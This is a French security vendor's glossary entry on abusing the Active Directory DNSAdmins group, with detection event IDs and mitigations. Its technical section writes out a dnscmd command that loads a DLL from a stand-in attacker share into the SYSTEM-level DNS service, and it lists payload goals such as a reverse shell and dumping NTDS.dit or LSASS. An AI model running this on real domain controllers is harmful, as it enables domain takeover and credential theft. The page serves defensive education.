Aller au contenu principal
Expert Cybersécurité & IAv9.0
Centres de ressources conformité
Besoin d'un accompagnement expert ?
Devis personnalisé sous 24h — audit, conformité, incident
Checklists Sécurité — Audit & Durcissement
Formats disponibles
📄 PDF 📊 Excel 🌐 Web

11 checklists professionnelles couvrant 2 200+ points de contrôle. Téléchargement gratuit, aucune inscription.

DNSAdmins Abuse

ad

Définition

Le DNSAdmins Abuse désigne l'exploitation historique d'un groupe de sécurité Active Directory nommé DNSAdmins, conçu pour déléguer l'administration du service DNS intégré à l'annuaire sans accorder les privilèges complets de Domain Admin, mais ayant longtemps disposé, par une conséquence de configuration par défaut, d'un vecteur d'escalade de privilèges permettant d'obtenir une exécution de code avec les privilèges SYSTEM sur le serveur hébergeant le rôle DNS, fréquemment un contrôleur de domaine lui-même. Cette technique reposait sur la capacité des membres de DNSAdmins à configurer le paramètre ServerLevelPluginDll du service DNS Windows, spécifiant une bibliothèque DLL arbitraire chargée automatiquement au redémarrage ou au rechargement du service, un attaquant contrôlant un compte membre de ce groupe pouvant ainsi désigner une DLL malveillante sous son contrôle pour obtenir une exécution de code privilégiée. Microsoft a publié des correctifs et recommandations restreignant progressivement cette exposition, mais la vigilance reste de mise dans les environnements n'ayant pas appliqué les dernières mises à jour de sécurité concernées. Cette technique illustre un cas emblématique de délégation d'administration en apparence limitée à un périmètre fonctionnel précis — la gestion DNS — se révélant en réalité exploitable pour une compromission complète de la machine hébergeant le service, justifiant un audit rigoureux de la composition de ce groupe dans tout environnement Active Directory.

Fonctionnement technique

dnscmd.exe [DC] /config /serverlevelplugindll \\attacker\share\malicious.dll — configure une DLL plugin au niveau serveur DNS. Au redémarrage du service DNS (sc stop/start dns), le processus dns.exe (SYSTEM) charge et exécute la DLL malveillante. La DLL peut créer un backdoor DA, dumper NTDS.dit, etc.

Exploitation et vecteurs d'attaque

  • Prérequis : Membre du groupe DNSAdmins
  • Impact : Exécution SYSTEM sur DC → DA complet
  • DLL payload : Reverse shell, ajout backdoor DA, dump LSASS

Détection et mitigation

  • Event ID 770 (DNS server) : plugin DLL chargée
  • Event ID 150 : DNS restart avec plugin
  • Limiter le groupe DNSAdmins aux besoins stricts
  • AppLocker/WDAC : bloquer le chargement de DLL non signées dans dns.exe

Articles liés

Un projet cybersécurité ?

Expert dispo · Réponse 24h

Devis